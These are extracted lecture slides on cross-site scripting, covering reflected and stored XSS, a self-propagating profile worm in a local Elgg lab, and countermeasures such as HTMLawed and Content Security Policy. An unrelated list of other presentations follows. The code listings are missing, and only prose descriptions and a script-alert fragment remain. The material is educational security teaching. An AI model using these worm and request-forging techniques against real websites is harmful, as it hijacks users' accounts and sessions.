Cross-Site Scripting Attack (XSS)

Cross-Site Scripting Attack (XSS)

Cross-Site Scripting Attack (XSS) Outline

The Cross-Site Scripting attack Reflected XSS Persistent XSS Damage done by XSS attacks XSS attacks to befriend with others

XSS attacks to change other peoples profiles Self-propagation Countermeasures The Cross-Site Scripting Attack Basically, code can do whatever the user can do inside the session.

In XSS, an attacker injects his/her malicious code to the victims browser via the target website. When code comes from a website, it is considered as trusted with respect to the website, so it can access and change the content on the

pages, read cookies belonging to the website and sending out requests on behalf of the user. Types of XSS Attacks Non-persistent (Reflected) XSS Attack Persistent (Stored) XSS Attack

Non-persistent (Reflected) XSS Attack If a website with a reflective behavior takes user inputs, then : Attackers can put JavaScript code in the input, so when the input is reflected back, the JavaScript code will be injected into the web page from the website.

Non-persistent (Reflected) XSS Attack Assume a vulnerable service on website : http://, where word is provided by the users. Now the attacker sends the following URL to the victim and tricks him to click the link: Once the victim clicks on this link, an HTTP GET request will be sent to the web server, which returns a page containing the search

result, with the original input in the page. The input here is a JavaScript code which runs and gives a pop-up message on the victims browser. Persistent (Stored) XSS Attack Attackers directly send their data to a target website/server which stores the data in a persistent storage. If the website later sends the

stored data to other users, it creates a channel between the users and the attackers. Example : User profile in a social network is a channel as it is set by one user and viewed by another. Persistent (Stored) XSS Attack These channels are supposed to be data channels.

But data provided by users can contain HTML markups and JavaScript code. If the input is not sanitized properly by the website, it is sent to other users browsers through the channel and gets executed by the browsers. Browsers consider it like any other code coming from the website. Therefore, the code is given the same privileges as that from the website. Damage Caused by XSS Web defacing: JavaScript code can use DOM APIs to access the DOM nodes inside the hosting page. Therefore, the injected JavaScript code can make

arbitrary changes to the page. Example: JavaScript code can change a news article page to something fake or change some pictures on the page. Spoofing requests: The injected JavaScript code can send HTTP requests to the server on behalf of the user. (Discussed in later slides) Stealing information: The injected JavaScript code can also steal victims private data including the session cookies, personal data displayed on the web page, data stored locally by the web application. Environment Setup

Elgg: open-source web application for social networking with disabled countermeasures for XSS. Elgg website : The website is hosted on localhost via Apaches Virtual Hosting Attack Surfaces for XSS attack To launch an attack, we need to find places where we can inject JavaScript code. These input fields are potential attack surfaces wherein attackers can put

JavaScript code. If the web application doesnt remove the code, the code can be triggered on the browser and cause damage. In our task, we will insert our code in the Brief Description field, so that when Alice views Samys profile, the code gets executed with a simple message. XSS Attacks to Befriend with Others Goal: Add Samy to other peoples friend list without their consent. Investigation taken by attacker Samy:

Samy clicks add-friend button from Charlies account (discussed in CSRF) to add himself to Charlies friend list. Using Firefoxs LiveHTTPHeader extension, he captures the add-friend request. XSS Attacks to Befriend with Others Line : URL of Elggs add-friend request. UserID of the user to

be added to the friend list is used. Here, Samys UserID (GUID) is 47. Line : Session cookie which is unique for each user. It is automatically sent by browsers. Here, if the attacker wants to access the cookies, it will be allowed as the JavaScript code is from Elgg website and not a thirdparty page like in CSRF.

Line : Elggs countermeasure against CSRF attacks (this is now enabled). XSS Attacks to Befriend with Others The main challenge is to find the values of CSRF countermeasures parameters : _elgg_ts and _elgg_token.

Line and : The secret values are assigned to two JavaScript variables, which make our attack easier as we can load the values from these variables. Our JavaScript code is injected inside the page, so it can access the JavaScript variables inside the page. Construct an Add-friend Request Line and : Get timestamp and secret token from the JavaScript

variables. Line and : Construct the URL with the data attached. The rest of the code is to create a GET request using Ajax. Inject the Code Into a Profile

Samy puts the script in the About Me section of his profile. After that, lets login as Alice and visit Samys profile. JavaScript code will be run and not displayed to Alice. The code sends an addfriend request to the server.

If we check Alices friends list, Samy is added. XSS Attacks to Change Other Peoples Profiles Goal: Putting a statement SAMY is MY HERO in other peoples profile without their consent. Investigation taken by attacker Samy : Samy captured an edit-profile request using LiveHTTPHeader.

Captured HTTP Request Line : URL of the edit-profile service. Line : Session cookie (unique for each user). It is automatically set by browsers. Line : CSRF

countermeasures, which are now enabled. Captured HTTP Request (continued) Line : Description field with our text Samy is my hero Line : Access level of each field: 2 means the field is viewable to everyone. Line : User ID (GUID) of the victim. This can be obtained by visiting victims

profile page source. In XSS, as this value can be obtained from the page. As we dont want to limit our attack to one victim, we can just add the GUID from JavaScript variable called elgg.session.user.guid. Construct the Malicious Ajax Request Construct the Malicious Ajax Request To ensure that it does not modify Samys own profile or it will overwrite the malicious

content in Samys profile. Inject the into Attackers Profile Samy can place the malicious code into his profile and then wait for others to visit his profile page. Login to Alices account and view Samys profile. As soon as Samys profile is loaded, malicious code will get executed. On checking Alice profile, we can see that SAMY IS MY HERO is added to the About me field of her profile.

Self-Propagation XSS Worm Using Samys worm, not only will the visitors of Samys profile be modified, their profiles can also be made to carry a copy of Samys JavaScript code. So, when an infected profile was viewed by others, the code can further spread. Challenges: How can JavaScript code produce a copy of itself? Two typical approaches: DOM approach: JavaScript code can get a copy of itself directly from DOM via DOM APIs

Link approach: JavaScript code can be included in a web page via a link using the src attribute of the script tag. Self -Propagation XSS Worm Self-Propagation XSS Worm Document Object Model (DOM) Approach : DOM organizes the contents of the page into a tree of objects (DOM nodes). Using DOM APIs, we can access each node on the tree.

If a page contains JavaScript code, it will be stored as an object in the tree. So, if we know the DOM node that contains the code, we can use DOM APIs to get the code from the node. Every JavaScript node can be given a name and then use the document.getElementByID() API to find the node.

Self-Propagation XSS Worm Use document.getElementById(worm) to get the reference of the node innerHTML gives the inside part of the node, not including the script tag. So, in our attack code, we can put the message in the description field along with a copy of the entire code. Self-Propagation XSS Worm

Line and : Construct a copy of the worm code, including the script tags. Line : We split the string into two parts and use + to concatenate them together. If we directly put the entire string, Firefoxs HTML parser will consider the string as a closing tag of the script block and the rest of the code will be ignored. Self-Propagation XSS Worm Line : In HTTP POST requests, data is sent with Content-Type as application/ x-www-form-urlencoded. We use encodeURIComponent() function to encode

the string. Line : Access level of each field: 2 means public. After Samy places this self-propagating code in his profile, when Alice visits Samys profile, the worm gets executed and modifies Alices profile, inside which, a copy of the worm code is also placed. So, any user visiting Alices profile will too get infected in the same way. Self-Propagation XSS Worm: The Link Approach The JavaScript code

xssworm.js will be fetched from the URL. Hence, we do not need to include all the worm code in the profile. Inside the code, we need to achieve damage and self-propagation.

Countermeasures: the Filter Approach Removes code from user inputs. It is difficult to implement as there are many ways to embed code other than to <script>alert(XSS) Countermeasures: Elggs Approach PHP module HTMLawed: Highly customizable PHP script to sanitize HTML against XSS attacks.

PHP function htmlspecialchars: Encode data provided by users, s.t., JavaScript code in users inputs will be interpreted by browsers only as strings and not as code. Defeating XSS using Content Security Policy Fundamental Problem: mixing data and code (code is inlined) Solution: Force data and code to be separated: (1) Dont allow the inline approach. (2) Only allow the link approach.

CSP Example Policy based on the origin of the code Code from self,, and google will be allowed. How to Securely Allow Inlined Code Using nonce Allowed

Not allowed Using hash of the code Setting CSP Rules Discussion Questions Question 1: What are the main differences of CSRF and XSS attacks? They both

have cross site in their names. Question 2: Can we use the countermeasures against CSRF attacks to defend against XSS attacks, including the secret token and same-site cookie approaches? Summary Two types of XSS attacks How to launch XSS attacks

Create a self-propagating XSS worm Countermeasures against XSS attacks

Recently Viewed Presentations

  • Todays Lesson: What: transformations (dilations). . . Why:

    Todays Lesson: What: transformations (dilations). . . Why:

    Directions: Plot the original points as indicated. Connect the points to make a right triangle. Then, perform the given dilation. Soooo, when a figure is dilated by a scale factor GREATER than one, the image gets _____.
  • Education and Training -

    Education and Training -

    Education and Training. The Royal College of Paediatrics and Child Health is a registered charity in England and Wales (1057744) and in Scotland (SCO38299).
  • Introduction to J.D. Salinger&#x27;s: The Catcher in the Rye

    Introduction to J.D. Salinger's: The Catcher in the Rye

    Dominant Symbols The Carousel The Red Hunting Cap The Catcher's Mitt The Ducks in Central Park Pond The Museum of Natural History Pencey Prep Holden's Quests Holden is looking for THREE things: The Innocence of Childhood Wants things to remain...
  • Corporate Profile

    Corporate Profile

    Also by comparing 1000-500 mb thickness and surface pressure isobars, which have historically been plotted together on weather charts (MSLP/1000-500 thickness chart) 500-1000mb Thickness In addition to isotherms on a constant pressure surface, we can look at thickness compared to...


    Leadership - 101 By Jeff Kowalski & Delores Mishleau Resource: "Launching a Leadership Revolution" by Chris Brady & Orrin Woodward "Leaders provide a mental picture of a preferred future and then ask people to follow them there." Andy Stanley "Leadership...
  • Latin II Semester Final Review I - Kenwood Academy

    Latin II Semester Final Review I - Kenwood Academy

    Know the chart on page 4: qui, quae, quod. Antecedent. Relative pronoun replaces the antecedent in the relative clause. Antecedents and relative pronouns AGREE in GENDER and NUMBER. 30-Active and Passive Voice. Active Voice o, s, t, mus, tis, nt.


    Times New Roman Arial Times Symbol Monotype Sorts Default Design Adobe Photoshop Image PowerPoint Presentation CHAPTER OBJECTIVES CHAPTER OBJECTIVES Introduction Introduction Introduction Discussion Question WHOLESALING INTERMEDIARIES Functions of Wholesaling Intermediaries Functions of Wholesaling Intermediaries PowerPoint Presentation ...
  • Safety Symbols - Mrs. B.Bell&#x27;s Classes

    Safety Symbols - Mrs. B.Bell's Classes

    Safety Symbols Disposal Alert This symbol appears when care must be taken to dispose of materials properly. Biological Hazard This symbol appears when there is danger involving bacteria, fungi, or protists. Open Flame Alert This symbol appears when use of...